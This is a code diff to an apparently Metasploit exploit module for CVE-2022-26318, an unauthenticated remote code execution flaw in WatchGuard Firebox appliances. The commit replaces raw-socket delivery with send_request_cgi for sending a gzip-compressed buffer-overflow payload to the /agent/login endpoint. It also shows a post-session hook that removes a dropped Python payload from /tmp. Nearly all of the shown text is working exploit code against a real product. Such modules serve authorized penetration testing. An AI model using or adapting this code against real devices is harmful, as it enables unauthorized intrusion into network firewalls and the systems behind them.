use send_request_cgi for payload delivery

Author: h00die-gr3y

modules/exploits/linux/http/watchguard_firebox_unauth_rce_cve_2022_26318.rb

@@ -124,40 +124,6 @@ def create_bof_payload
     return Zlib.gzip(payload)
   end
 
-  def create_final_payload
-    http_payload = "POST /agent/login HTTP/1.1\r\n"
-    http_payload << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
-    http_payload << "Accept-Encoding: gzip, deflate\r\n"
-    http_payload << "Accept: */*\r\n"
-    http_payload << "Connection: close\r\n"
-    http_payload << "Content-Encoding: gzip\r\n"
-
-    bof_payload = create_bof_payload
-
-    http_payload << "Content-Length: #{bof_payload.length}\r\n"
-    http_payload << "\r\n"
-
-    return http_payload.encode + bof_payload
-  end
-
-  def send_payload(payload)
-    sock = Rex::Socket::SslTcp.create(
-      'PeerHost' => datastore['RHOST'],
-      'PeerPort' => datastore['RPORT'],
-      'Proxies' => datastore['Proxies'],
-      'Context' => {
-        'Msf' => framework,
-        'MsfExploit' => self
-      }
-    )
-    sock.write(payload)
-  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-    fail_with(Failure::UnexpectedReply, "#{e.class} - #{e.message}")
-    elog(e)
-  ensure
-    sock.close if sock
-  end
-
   def on_new_session(session)
     # cleanup python payload script in /tmp
     session.run_command('import os')
@@ -174,8 +140,16 @@ def check
 
   def exploit
     print_status("#{peer} - Attempting to exploit...")
-    final_payload = create_final_payload
+    bof_payload = create_bof_payload
     print_status("#{peer} - Sending payload...")
-    send_payload(final_payload)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'agent', 'login'),
+      'headers' => {
+        'Accept-Encoding' => 'gzip, deflate',
+        'Content-Encoding' => 'gzip'
+      },
+      'data' => bof_payload
+    })
   end
 end